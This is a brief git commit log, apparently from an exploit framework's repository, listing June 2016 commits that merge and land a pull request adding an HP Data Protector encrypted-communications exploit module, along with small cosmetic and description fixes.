Brendan Watters 7e84c808b2 Merge remote-tracking branch 'upstream/pr/6924' into dev 2016-06-07 09:24:25 -05:00
wchen-r7 b59d10d9c4
Land #6929, Add HP Data Protector Encrypted Comms exploit 2016-06-06 22:45:53 -05:00
wchen-r7 60c60bf004 Minor cosmetic changes 2016-06-06 22:45:00 -05:00
Vex Woo e4c55f97db Fix module desc 2016-06-06 10:40:36 -05:00